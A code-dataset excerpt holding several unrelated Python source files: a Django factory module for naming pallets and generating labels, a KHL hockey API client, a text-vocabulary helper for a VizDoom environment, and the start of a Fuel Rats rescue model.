e_p.save()\n\ndef palete_nome(pk):\n instance = Palete.objects.get(pk=pk)\n if not instance.nome:\n ano = instance.data_pal\n ano = ano.strftime('%Y')\n if instance.estado == 'DM':\n num = instance.num\n \n if num < 10:\n instance.nome = 'DM000%s-%s' % (num, ano)\n elif num < 100:\n instance.nome = 'DM00%s-%s' % (num, ano)\n elif num < 1000:\n instance.nome = 'DM0%s-%s' % (num, ano)\n else:\n instance.nome = 'DM%s-%s' % (num, ano)\n instance.save()\n\n elif instance.estado == 'G':\n if instance.retrabalhada == False: \n # palete = Palete.objects.filter(estado='G', data_pal__gte='2019-01-01')\n # num = 0\n # for p in palete:\n # if p.num > num:\n # num = p.num\n \n num = instance.num\n if num < 10: \n instance.nome = 'P000%s-%s' % (num, ano) \n elif num < 100:\n instance.nome = 'P00%s-%s' % (num, ano)\n elif num < 1000:\n instance.nome = 'P0%s-%s' % (num, ano)\n else: \n instance.nome = 'P%s-%s' % (num, ano)\n\n instance.save()\n\n \n if EtiquetaPalete.objects.filter(palete=instance).exists():\n return redirect('producao:palete_details', pk=instance.pk)\n else:\n if instance.retrabalhada == False:\n e_p = EtiquetaPalete.objects.create(palete=instance, palete_nome=instance.nome, largura_bobine=instance.largura_bobines)\n if instance.cliente != None:\n e_p.cliente = instance.cliente.nome\n else:\n e_p = EtiquetaPalete.objects.create(palete=instance, palete_nome=instance.nome, largura_bobine=instance.largura_bobines)\n e_p.save()\n \n \ndef bobinagem_retrabalho_nome(data, num_bobinagem):\n data = data.strftime('%Y%m%d')\n map(int, data)\n if num_bobinagem < 10:\n nome_s_emendas = '4%s-0%s' % (data[1:], num_bobinagem)\n nome_c_emendas = '3%s-0%s' % (data[1:], num_bobinagem)\n else:\n nome_s_emendas = '4%s-%s' % (data[1:], num_bobinagem)\n nome_c_emendas = '3%s-%s' % (data[1:], num_bobinagem)\n\n return (nome_s_emendas, nome_c_emendas)\n\n\ndef update_etiqueta_final(pk):\n palete = get_object_or_404(Palete, pk=pk)\n e_p = get_object_or_404(EtiquetaPalete, palete=palete)\n e_f = get_object_or_404(EtiquetaFinal, palete=palete)\n bobines = Bobine.objects.filter(palete=palete)\n bobine_1 = Bobine.objects.get(palete=palete, posicao_palete=1)\n palete_nome = e_p.palete_nome\n produto = e_p.produto\n largura_bobine = e_p.largura_bobine\n diam_min = e_p.diam_min\n diam_max = e_p.diam_max\n cliente = e_p.cliente\n cod_cliente = palete.cliente.cod\n core_bobines = palete.core_bobines\n area = palete.area\n comp_total = palete.comp_total\n prf = palete.carga.enc.prf\n num_bobines = palete.num_bobines\n peso_liquido = palete.peso_liquido\n peso_bruto = palete.peso_bruto\n num_paletes_total = palete.carga.num_paletes\n num_palete_carga = palete.num_palete_carga\n\n cod_cliente_cliente = None\n if cliente == 'ONTEX':\n if largura_bobines == 140:\n cod_cliente_cliente = 'G2.6592'\n elif largura_bobines == 80:\n cod_cliente_cliente = 'G2.6590'\n elif largura_bobines == 70:\n cod_cliente_cliente = 'G2.6589'\n elif largura_bobines == 65:\n cod_cliente_cliente = 'G2.6543'\n elif largura_bobines == 130:\n cod_cliente_cliente = 'G2.6591'\n elif cliente == 'ABENA':\n if largura_bobines == 150:\n cod_cliente_cliente = '10000018848'\n elif cliente == 'Paul Hartman':\n if largura_bobines == 240:\n cod_cliente_cliente = 'ELASTEK m16'\n elif cliente == 'Sanita S.A.L.':\n if largura_bobines == 150:\n cod_cliente_cliente = 'R406EAR15'\n\n if core_bobines == '3':\n core_bobines = 76.6\n elif core_bobines == '6':\n core_bobines = 152.6\n\n #data_inicial = palete.carga.data\n data_init = None\n for b in bobines:\n if data_init == None or b.bobinagem.data < data_init:\n data_init = b.bobinagem.data\n data_prod = data_init\n #data_prod = data_inicial\n \n data_validade = data_prod + datetime.timedelta(days=356)\n\n gsm = bobine_1.largura.gsm\n\n if cod_cliente_cliente is not None:\n e_f.palete_nome = palete_nome\n e_f.produto = produto\n e_f.largura_bobine = largura_bobine\n e_f.diam_min = diam_min\n e_f.diam_max = diam_max\n e_f.cod_cliente = cod_cliente\n e_f.cod_cliente_cliente = cod_cliente_cliente\n e_f.core = core_bobines\n e_f.area = area\n e_f.comp = comp_total\n e_f.prf = prf\n e_f.num_bobines = num_bobines\n e_f.palete_num = num_palete_carga\n e_f.palete_total = num_paletes_total\n e_f.peso_liquido = peso_liquido\n e_f.peso_bruto = peso_bruto\n e_f.data_prod = data_prod\n e_f.data_validade = data_validade\n e_f.gsm = gsm\n e_f.save()\n else:\n e_f.palete_nome = palete_nome\n e_f.produto = produto\n e_f.largura_bobine = largura_bobine\n e_f.diam_min = diam_min\n e_f.diam_max = diam_max\n e_f.cod_cliente = cod_cliente\n e_f.core = core_bobines\n e_f.area = area\n e_f.comp = comp_total\n e_f.prf = prf\n e_f.num_bobines = num_bobines\n e_f.palete_num = num_palete_carga\n e_f.palete_total = num_paletes_total\n e_f.peso_liquido = peso_liquido\n e_f.peso_bruto = peso_bruto\n e_f.data_prod = data_prod\n e_f.data_validade = data_validade\n e_f.gsm = gsm\n e_f.save()\n \n \n\ndef gerar_etiqueta_final(pk):\n palete = get_object_or_404(Palete, pk=pk)\n e_p = get_object_or_404(EtiquetaPalete, palete=palete)\n bobines = Bobine.objects.filter(palete=palete)\n bobine_1 = Bobine.objects.get(palete=palete, posicao_palete=1)\n palete_nome = e_p.palete_nome\n produto = e_p.produto\n largura_bobines = e_p.largura_bobine\n diam_min = e_p.diam_min\n diam_max = e_p.diam_max\n cliente = e_p.cliente\n cod_cliente = palete.cliente.cod\n core_bobines = palete.core_bobines\n area = palete.area\n comp_total = palete.comp_total\n prf = palete.carga.enc.prf\n order_num = palete.carga.enc.order_num\n num_bobines = palete.num_bobines\n peso_liquido = palete.peso_liquido\n peso_bruto = palete.peso_bruto\n num_paletes_total = palete.carga.num_paletes\n num_palete_carga = palete.num_palete_carga\n artigo = bobine_1.artigo\n ult_cont = EtiquetaFinal.objects.latest('id').cont\n\n\n palete_hora_str = palete.timestamp.strftime('%H')\n palete_hora = int(palete_hora_str)\n turno = ''\n \n if palete_hora >= 8 and palete_hora < 16:\n turno = 'A'\n elif palete_hora >= 16 and palete_hora <= 23:\n turno = 'B'\n elif palete_hora >= 0 and palete_hora < 8:\n turno = 'C'\n \n cod_cliente_cliente = None\n try:\n artigo_cliente = ArtigoCliente.objects.get(artigo=bobine_1.artigo, cliente=palete.cliente)\n cod_cliente_cliente = artigo_cliente.cod_client\n except:\n cod_cliente_cliente = None\n \n\n # if cliente == 'ONTEX':\n # if largura_bobines == 140:\n # cod_cliente_cliente = 'G2.6592'\n # elif largura_bobines == 80:\n # cod_cliente_cliente = 'G2.6590'\n # elif largura_bobines == 70:\n # cod_cliente_cliente = 'G2.6589'\n # elif largura_bobines == 65:\n # cod_cliente_cliente = 'G2.6543'\n # elif largura_bobines == 130:\n # cod_cliente_cliente = 'G2.6591'\n # elif cliente == 'ABENA':\n # if largura_bobines == 150:\n # cod_cliente_cliente = '10000018848'\n # elif cliente == 'Paul Hartman':\n # if largura_bobines == 240:\n # cod_cliente_cliente = 'ELASTEK m16'\n if cliente == 'NUNEX' or cliente == 'Faderco SPA':\n area = (peso_liquido * 1000) / 100 \n comp_total = (Decimal(area) / ((Decimal(num_bobines) * Decimal(largura_bobines)) * Decimal(0.001))) * (Decimal(num_bobines))\n\n\n\n\n if core_bobines == '3':\n core_bobines = 76.6\n elif core_bobines == '6':\n core_bobines = 152.6\n\n #data_inicial = palete.carga.data\n data_init = None\n for b in bobines:\n if data_init == None or b.bobinagem.data < data_init:\n data_init = b.bobinagem.data\n data_prod = data_init\n #data_prod = data_inicial\n\n data_validade = data_prod + datetime.timedelta(days=356)\n\n gsm = bobine_1.largura.gsm\n \n cont = ult_cont + 1\n gtin = artigo.gtin\n # control = cont\n # gtin_str = (str(gtin)[:-2])\n # sscc_str = \"0\" + gtin_str + str(cont) + str(control)\n # sscc = sscc_str\n \n if EtiquetaFinal.objects.filter(palete=palete).exists():\n e_f_e = EtiquetaFinal.objects.filter(palete=palete)\n for e in e_f_e:\n e.activa = False\n e.save()\n\n \n if cod_cliente_cliente is not None:\n e_f = EtiquetaFinal.objects.create(cont=cont, gtin=gtin, palete=palete, palete_nome=palete_nome, produto=produto, largura_bobine=largura_bobines, diam_min=diam_min, diam_max=diam_max, cod_cliente=cod_cliente, cod_cliente_cliente=cod_cliente_cliente, core=core_bobines, area=area, comp=comp_total, prf=prf, num_bobines=num_bobines, palete_num=num_palete_carga, palete_total=num_paletes_total, peso_liquido=peso_liquido, peso_bruto=peso_bruto, data_prod=data_prod, data_validade=data_validade, gsm=gsm, order_num=order_num, turno=turno)\n else:\n e_f = EtiquetaFinal.objects.create(cont=cont, gtin=gtin, palete=palete, palete_nome=palete_nome, produto=produto, largura_bobine=largura_bobines, diam_min=diam_min, diam_max=diam_max, cod_cliente=cod_cliente, core=core_bobines, area=area, comp=comp_total, prf=prf, num_bobines=num_bobines, palete_num=num_palete_carga, palete_total=num_paletes_total, peso_liquido=peso_liquido, peso_bruto=peso_bruto, data_prod=data_prod, data_validade=data_validade, gsm=gsm, order_num=order_num, turno=turno)\n \n\ndef add_artigo_to_bobine(pk):\n palete = get_object_or_404(Palete, pk=pk)\n bobines = Bobine.objects.filter(palete=palete)\n cliente = palete.cliente\n artigos = Artigo.objects.all()\n \n if cliente.nome == 'BB DISTRIBE SAS':\n for b in bobines:\n if (b.largura.largura == 160 and b.palete.cliente.diam_ref == 1200 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=61)\n b.artigo = artigo\n b.save()\n else:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n elif cliente.nome == 'Faderco SPA':\n for b in bobines:\n if (b.largura.largura == 160 and b.palete.cliente.diam_ref == 1200 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=48)\n b.artigo = artigo\n b.save()\n else:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n elif cliente.nome == 'ENKA HIJYEN' or cliente.nome == 'PAKTEN SAGLIK URUNLERI' :\n for b in bobines:\n if (b.largura.largura == 75 and b.palete.cliente.diam_ref == 1100 and b.bobinagem.perfil.core == '6' and b.largura.gsm == '100' and b.largura.designacao_prod == 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE'):\n artigo = get_object_or_404(Artigo, pk=66)\n b.artigo = artigo\n b.save()\n else:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n else:\n for b in bobines:\n for a in artigos:\n if (b.largura.largura == a.lar and b.palete.cliente.diam_ref == a.diam_ref and b.bobinagem.perfil.core == a.core and b.largura.gsm == a.gsm and b.largura.designacao_prod == a.produto):\n artigo = get_object_or_404(Artigo, pk=a.pk)\n b.artigo = artigo\n b.save()\n\n# def palete_carga_num(carga_pk, palete_pk):\n# carga = get_object_or_404(Carga, pk=carga_pk)\n# palete = get_object_or_404(Palete, pk=palete_pk)\n \n# paletes_carga_1 = Palete.objects.filter(carga=carga)\n# cont1 = 0\n# array_num_palete = []\n \n# for p1 in paletes_carga_1:\n# array_num_palete[cont1] = p1.num_palete_carga\n# cont1 += 1\n\n# if len(array_num_palete) == 0:\n# palete.num_palete_carga = 1\n# else:\n# array_num_palete.sort()\n# cont2 = 0\n# for a in array_num_palete:\n# if a[cont2] != cont2 + 1:\n# palete.num_palete_carga = cont2 + 1\n# break\n# elif len(array_num_palete) == cont2 + 1:\n# palete.num_palete_carga = cont2 + 2\n# break \n# cont2 += 1\n \n# palete.save()\n \n\ndef comp_dm(b1, m1, b2, m2, b3, m3):\n b_1 = Bobine.objects.get(pk=b1.pk)\n \n try:\n b_2 = Bobine.objects.get(pk=b2.pk)\n except:\n b_2 = \"N/A\"\n m_2 = \"N/A\"\n \n try:\n b_3 = Bobine.objects.get(pk=b3.pk)\n except:\n b_3 = \"N/A\"\n m_3 = \"N/A\"\n\n if b_1 != \"N/A\" and b_2 != \"N/A\" and b_3 != \"N/A\":\n comp_total = int(m1) + int(m2) + int(m3)\n elif b_1 != \"N/A\" and b_2 != \"N/A\":\n comp_total = int(m1) + int(m2)\n elif b_1 != \"N/A\":\n comp_total = int(m1)\n\n return comp_total\n\n\ndef retrabalho_nome(pk, emendas):\n bobinagem = Bobinagem.objects.get(pk=pk)\n bobines = Bobine.objects.filter(bobinagem=bobinagem)\n data = bobinagem.data\n data = data.strftime('%Y%m%d')\n map(int, data)\n if emendas > 1:\n if bobinagem.num_bobinagem < 10:\n bobinagem.nome = '3%s-0%s' % (data[1:], bobinagem.num_bobinagem)\n bobinagem.save()\n else:\n bobinagem.nome = '3%s-%s' % (data[1:], bobinagem.num_bobinagem)\n bobinagem.save()\n\n for b in bobines:\n if b.largura.num_bobine < 10:\n b.nome = '%s-0%s' % (bobinagem.nome, b.largura.num_bobine)\n b.save()\n else:\n b.nome = '%s-%s' % (bobinagem.nome, b.largura.num_bobine)\n b.save()\n \n \n \ndef recycling_bobine(pk):\n bobines = []\n bobinagem = get_object_or_404(Bobinagem, pk=pk)\n emendas = Emenda.objects.filter(bobinagem=bobinagem)\n for e in emendas:\n if e.bobine.recycle == True:\n bobines.append(e.bobine)\n \n print(bobines)\n\n # Remover bobine da palete e recalcular campos da palete\n for b in bobines:\n if b.palete != None:\n palete = get_object_or_404(Palete, pk=b.palete.pk)\n posicao_palete = b.posicao_palete\n b.palete = None\n b.posicao_palete = None\n palete.area -= b.area\n palete.comp_total -= b.bobinagem.comp_cli\n palete.num_bobines -= 1\n palete.num_bobines_act -= 1\n palete.save()\n\n # Correção de posições das bobines da Palete\n bobines_palete = Bobine.objects.filter(palete=palete).order_by('posicao_palete')\n count = 1\n for bp in bobines_palete:\n if bp.posicao_palete == count:\n count += 1\n bp.save()\n else: \n bp.posicao_palete = count\n count += 1\n bp.save()\n\n # Etiqueta de palete\n \n return print('recycling_bobine')\n\ndef invert_recycle_bobine(pk):\n\n return print('invert_recycle_bobine')\n\ndef cancel_insert_larguras(request, pk):\n perfil = get_object_or_404(Perfil, pk=pk)\n larguras = Largura.objects.filter(perfil=perfil)\n for l in larguras:\n l.delete()\n\n \n if perfil.retrabalho == False:\n perfil.delete()\n return redirect('producao:perfil_create_linha_v2')\n else:\n perfil.delete()\n return redirect('producao:perfil_create_dm_v2')\n\ndef create_perfil_token(num_bobines, produto, core, larguras, produtos, gsms, retrabalho, core_original, largura_original, clientes, artigos):\n \n produtos_dict = {\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE': 'A',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HT': 'B',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 95 HE': 'C', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 90 HE HL': 'D', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 95 HE HL': 'E', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 90 HT HL': 'F', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 95 HE HL': 'G', \n 'NONWOVEN ELASTIC BANDS ELA-SPUN 100 HE HL': 'H', \n 'SIDE PANEL ELA-ACE 100 HE': 'I',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 100 HE BICO': 'J',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 105 HE': 'K', \n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE(D)': 'L', \n 'FRONTAL TAPE 48': 'M', \n 'CAR PROTECTION SHEET 57': 'N', \n 'ELASTIC FILM': 'O',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 100 HE(L)': 'P',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 75 HE': 'Q',\n 'NONWOVEN ELASTIC BANDS ELA-ACE 95 HT': 'R',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 60 HE': 'S',\n 'NONWOVEN ELASTIC BANDS ELA-SPUN 60 HT': 'T',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 50 23B': 'U',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 50 23A':'V',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 45 16B': 'W',\n 'NONWOVEN TEXTILE BACKSHEET ELA-TBS 45 16A': 'X',\n 'STRETCHABLE NONWOVEN ELASTIC BANDS ELA-ACE 100 HE': 'Y',\n 'NONWOVEN ELASTIC BAND ELA-CARDED AMOSTRA': 'Z',\n 'NONWOVEN ELASTIC BAND ELA-CARDED 100 HE': 'AA',\n 'NONWOVEN ELASTIC BAND ELA-SPUN 75 HT': 'AB',\n\t 'NONWOVEN ELASTIC BAND ELA-CARDED 100': 'AC',\n\t 'NONWOVEN ELASTIC BAND 100 HE NON WOVEN STRETCH EAR': 'AD',\n\t 'NONWOVEN ELASTIC BAND ELA-ACE 100 T-HT': 'AE',\n\t 'NONWOVEN ELASTIC BAND ELA-ACE 100 T-HE': 'AF',\n 'NONWOVEN ELASTIC BAND ELA-ACE 100 HE(L) PUNCTURED': 'AG',\n 'NONWOVEN ELASTIC BAND ELA-ACE 95 T-HE': 'AH',\n 'NONWOVEN ELASTIC BAND ELA-CARDED 80': 'AI',\n 'Nonwoven Elastic Band ELA-ACE Amostra': 'AJ',\n 'NW Elastic Bands ELA-ACE 100 HE (L) PUNCTURED Amostra': 'AK'\n\n }\n\n gsm_dict = {\n '105': '1',\n '100': '2',\n '95': '3',\n '90': '4',\n '80': '5',\n '57': '6',\n '50': '7',\n '48': '8',\n '75': '9',\n '60': '10',\n '45': '11',\n '25': '12',\n }\n\n token = '' + str(num_bobines) + produtos_dict.get(produto) + core \n\n for l in larguras:\n token += str(l)\n\n for p in produtos:\n token += produtos_dict.get(p)\n \n for gsm in gsms:\n token += gsm_dict.get(gsm)\n \n for cliente in clientes:\n if cliente != None:\n token += str(cliente.pk)\n else:\n token += 'N'\n \n for artigo in artigos:\n if artigo != None:\n token += str(artigo.pk)\n else:\n token += 'N'\n \n if retrabalho == True:\n token = 'DM' + token + str(core_original) + str(largura_original)\n else:\n token = 'L1' + token\n \n return token\n\ndef edit_bobine(pk):\n bobinagem = get_object_or_404(Bobinagem, pk=pk)\n bobines = Bobine.objects.filter(bobinagem=bobinagem)\n desp_bobine = bobinagem.desper / Decimal(bobinagem.perfil.num_bobines)\n\n for bob in bobines:\n bob.comp = bobinagem.comp_cli\n bob.comp_actual = bobinagem.comp_cli\n largura = bob.largura.largura / 1000\n bob.area = largura * bob.bobinagem.comp_cli\n\n if bobinagem.tipo_desp == 'R':\n bob.tipo_desp = 'R'\n bob.desp = desp_bobine\n elif bobinagem.tipo_desp == 'BA':\n bob.tipo_desp = 'BA'\n bob.desp = desp_bobine\n bob.save()\n etiqueta = get_object_or_404(EtiquetaRetrabalho, bobine=bob.nome)\n etiqueta.diam = bobinagem.diam\n etiqueta.comp_total = bobinagem.comp_cli\n etiqueta.area = bob.area\n etiqueta.save()\n\n\n\n# def delete_sessions():\n# if datetime.now() == '12:54':\n# Session.objects.all().delete()\n\n\n\ndef multipleOf10(num):\n\n result = num%10\n print(result)\n\n return result","sub_path":"sistema/producao/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":36990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"45930284","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\n\nclass KHLAPI:\n tournamentId = 0\n\n url = 'http://khl.egluservices.com/services/query.php'\n\n headers = {\n 'User-Agent': 'КХЛ/3013 CFNetwork/758.0.2 Darwin/15.0.0',\n }\n\n base = {\n 'os': 'android',\n 'lang': 'ru',\n }\n\n def _req(self, payload):\n payload.update(self.base)\n r = requests.post(url=self.url, data=payload, headers=self.headers)\n\n if r.status_code != 200:\n return False\n\n return r.json()\n\n def setTournament(self, tournamentId):\n self.tournamentId = tournamentId\n\n return self\n\n def getAllTournaments(self):\n \"\"\"Чемпионаты\"\"\"\n payload = {\n 'requestName': 'allTournaments',\n }\n\n return self._req(payload)\n\n def getTeamList(self):\n \"\"\"Команды турнира\"\"\"\n payload = {\n 'requestName': 'teamList',\n 'tournamentId': self.tournamentId,\n }\n\n return self._req(payload)\n\n def getTeamMembers(self, teamId):\n \"\"\"Состав команды турнира\"\"\"\n payload = {\n 'requestName': 'teamMembers',\n 'tournamentId': self.tournamentId,\n 'teamId': teamId,\n }\n\n return self._req(payload)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"215366365","text":"import numpy as np\n\nimport nltk\nimport string\nfrom nltk.stem import PorterStemmer\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle as pkl\n\nimport json\nimport os\n\nimport random\n\nclass TokenizeStemSentence(object):\n\n def __init__(self):\n self.stemmer = PorterStemmer()\n self.trans_table = str.maketrans(dict.fromkeys(string.punctuation))\n self.stop_word = nltk.corpus.stopwords.words('english')\n\n def tokenize_and_stem(self, sentence):\n sentence_wordlist = []\n sentence_wo_punct = str.translate(sentence, self.trans_table)\n words = nltk.tokenize.word_tokenize(sentence_wo_punct)\n\n for raw_word in words:\n word = raw_word.lower()\n if word not in self.stop_word:\n sentence_wordlist.append(self.stemmer.stem(word))\n\n return sentence_wordlist\n\n def __call__(self, sentence):\n return self.tokenize_and_stem(sentence=sentence)\n\n\nclass TextToIds(object):\n def __init__(self, max_sentence_length, path_to_vocab=\"data/text/vocabulary.pkl\"):\n\n self.path_to_vocabulary = path_to_vocab\n vocab_dict = pkl.load(open(self.path_to_vocabulary, 'rb'))\n self.all_words, self.max_sentence_length = vocab_dict['all_words'], vocab_dict['max_sentence_length']\n\n self.max_sentence_length = max_sentence_length\n\n self.tokenizer = TokenizeStemSentence()\n self.word_to_id = LabelEncoder()\n\n all_words_encoded = self.word_to_id.fit_transform(np.array(list(self.all_words)))\n\n self.eos_id = int(self.word_to_id.transform(['eos'])[0])\n\n def pad_encode(self, sentence):\n sentence = self._sentence_to_matrix(sentence)\n sentence, sentence_length = self._pad(sentence=sentence)\n return sentence, sentence_length\n\n def _sentence_to_matrix(self, sentence):\n sentence_array = np.array(self.tokenizer(sentence))\n sentence_encoded = self.word_to_id.transform(sentence_array)\n\n return sentence_encoded\n\n def _pad(self, sentence):\n sentence_length = len(sentence)\n n_padding = self.max_sentence_length - sentence_length\n if n_padding != 0:\n padding = np.ones(n_padding)*self.eos_id\n sentence = np.concatenate((sentence, padding), axis=0)\n return sentence, sentence_length\n\nclass TextObjectiveGenerator(object):\n\n def __init__(self, env_specific_vocab,\n path_to_text=\"/home/sequel/mseurin/gym-vizdoom/gym_vizdoom/envs/data/Basic\",\n #path_to_text=\"../gym-vizdoom/gym_vizdoom/envs/data/Basic\",\n sentence_file=\"sentences.json\",\n mode=\"simple\"):\n \"\"\"\n :param env_specific_vocab: a list of word that are being used in the env calling this Objective Generator.\n :param mode : can be simple, medium, hard\n \"\"\"\n\n self.path_to_text = path_to_text\n\n self.path_to_sentences = os.path.join(self.path_to_text, sentence_file)\n self.path_to_vocabulary = os.path.join(self.path_to_text, 'vocabulary.pkl')\n\n # can be color, name of object etc ..., will be used to fill template\n self.env_specific_vocab = env_specific_vocab\n\n self.tokenize_sentence = TokenizeStemSentence()\n\n # Token like : begin of sentence, end of sentence etc ...\n self.special_tokens = ['eos']\n\n self.all_sentences_template = {} # keys are : sentence_color, absolute_position_sentence, relative_position_sentence\n self.load_sentences()\n\n if os.path.exists(self.path_to_vocabulary):\n vocab = pkl.load(open(self.path_to_vocabulary, 'rb'))\n self.all_words = vocab[\"all_words\"]\n self.max_sentence_length = vocab[\"max_sentence_length\"]\n else:\n self.build_vocabulary()\n\n self.voc_size = len(self.all_words)\n #print(self.all_words)\n\n # Regarding difficulty of the task\n self.keys = [\"sentence_color\", \"absolute_position_sentence\", \"relative_position_sentence\"]\n self.mode = mode\n\n self.text_to_id = TextToIds(max_sentence_length=self.max_sentence_length,\n path_to_vocab=self.path_to_vocabulary)\n\n self.text_shape = (self.max_sentence_length)\n\n\n def sample(self, color, position, other_color):\n def _choice_color(sentences_template, color, position, other_color):\n random_sentence = random.choice(sentences_template[\"sentence_color\"])\n random_sentence = random_sentence.format(color=color.lower())\n #print(random_sentence)\n return random_sentence\n\n def _choice_abs_position(sentences_template, color, position, other_color):\n random_sentence = random.choice(sentences_template[\"absolute_position_sentence\"][str(position)])\n return random_sentence\n\n def _choice_rel_position(sentences_template, color, position, other_color):\n assert NotImplementedError(\"Relative position not implemented yet\")\n\n all_choices_function = [_choice_color, _choice_abs_position, _choice_rel_position]\n\n if self.mode == \"simple\" :\n possible_function = [all_choices_function[0]]\n elif self.mode == \"medium\" :\n possible_function = all_choices_function[:2]\n elif self.mode == \"hard\":\n possible_function = all_choices_function[:3]\n else:\n assert False, \"Wrong difficulty parameters, should be simple, medium, hard. Not '{}'\".format(self.mode)\n\n random_selector = random.randint(0, len(possible_function)-1) # -1 because randint include upper bound\n # call a random sampler based on all objective possibility\n random_sentence = possible_function[random_selector](self.all_sentences_template, color, position, other_color)\n\n return self.text_to_id.pad_encode(random_sentence)\n\n def load_sentences(self):\n\n self.all_sentences_template = json.load(open(self.path_to_sentences))\n\n def build_vocabulary(self):\n\n def _recurse_vocab_builder(sentences, all_word_list, maximum_sent_length):\n \"\"\"\n Build vocabulary from nested dictionnary\n :param sentences: dictionnary to retrieve vocabulary from\n :param all_word_list: should be [] when called for first time\n :return: list of all word in nested dictionnary\n \"\"\"\n\n if type(sentences) is list:\n new_words = []\n for sentence in sentences:\n sentence.replace('{color}', '')\n #print(sentence)\n temp_words = self.tokenize_sentence(sentence)\n #print(temp_words)\n maximum_sent_length = max(len(temp_words), maximum_sent_length)\n\n new_words.extend(temp_words)\n\n elif type(sentences) is dict:\n\n new_words = []\n for key, item in sentences.items():\n more_words, sub_max_length = _recurse_vocab_builder(item, all_word_list, maximum_sent_length=maximum_sent_length)\n new_words.extend(more_words)\n maximum_sent_length = max(maximum_sent_length, sub_max_length)\n\n else:\n assert False, \"Should be list or dict, no way around. Is {}\".format(type(sentences))\n\n all_word_list.extend(new_words)\n\n return all_word_list, maximum_sent_length\n\n all_words = set([self.tokenize_sentence.stemmer.stem(word.lower()) for word in self.env_specific_vocab])\n\n # Retrieve vocab from templates and add it to vocabulary\n words_from_sentences, self.max_sentence_length = _recurse_vocab_builder(sentences=self.all_sentences_template,\n all_word_list=[],\n maximum_sent_length=0)\n\n words_from_sentences = set(words_from_sentences)\n all_words = all_words.union(words_from_sentences)\n self.all_words = all_words.union(set(self.special_tokens))\n\n # Save vocabulary for later usage in model\n print(\"Saving vocab, vocab size is {}, max length is {}\".format(len(self.all_words), self.max_sentence_length))\n pkl.dump({\"all_words\" : self.all_words, \"max_sentence_length\": self.max_sentence_length}, open(self.path_to_vocabulary, 'wb'))","sub_path":"gym_vizdoom/envs/text_utils.py","file_name":"text_utils.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"605743992","text":"\"\"\"\nrat_rescue.py - Rescue board and objects\n\nCopyright (c) 2018 The Fuel Rat Mischief,\nAll rights reserved.\n\nLicensed under the BSD 3-Clause License.\n\nSee LICENSE.md\n\nThis module is built on top of the Pydle system.\n\"\"\"\nimport logging\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import reduce\nfrom operator import xor\nfrom typing import Union, Optional, List, TYPE_CHECKING\nfrom uuid import UUID\n\nfrom Modules.epic import Epic\nfrom Modules.mark_for_deletion import MarkForDeletion\nfrom Modules.rat import Rat\nfrom Modules.rat_cache import RatCache\nfrom Modules.rat_quotation import Quotation\nfrom utils.ratlib import Platforms, Status\n\nif TYPE_CHECKING:\n from Modules.rat_board import RatBoard\n\nlog = logging.getLogger(f\"mecha.{__name__}\")\n\n\nclass Rescue(object):\n \"\"\"\n A unique rescue\n \"\"\"\n\n def __init__(self, uuid: UUID = None,\n client: Optional[str] = None,\n system: Optional[str] = None,\n irc_nickname: Optional[str] = None,\n board: 'RatBoard' = None,\n created_at: Optional[datetime] = None,\n updated_at: Optional[datetime] = None,\n unidentified_rats: Optional[List[str]] = None,\n active: bool = True,\n quotes: Optional[List[Quotation]] = None,\n epic: List[Epic] = None,\n title: Optional[str] = None,\n first_limpet: Optional[UUID] = None,\n board_index: Optional[int] = None,\n mark_for_deletion: MarkForDeletion = MarkForDeletion(),\n lang_id: str = \"EN\",\n rats: List[Rat] = None,\n status: Status = Status.OPEN,\n code_red=False):\n \"\"\"\n creates a unique rescue\n\n Args:\n\n code_red (bool): is the client on emergency oxygen\n status (Status): status attribute for the rescue\n board (RatBoard): RatBoard instance this rescue is attached to, if any.\n uuid (str): API id of rescue\n client (str): Commander name of the Commander rescued\n system (str): System name the Commander is stranded in\n (WILL BE CAST 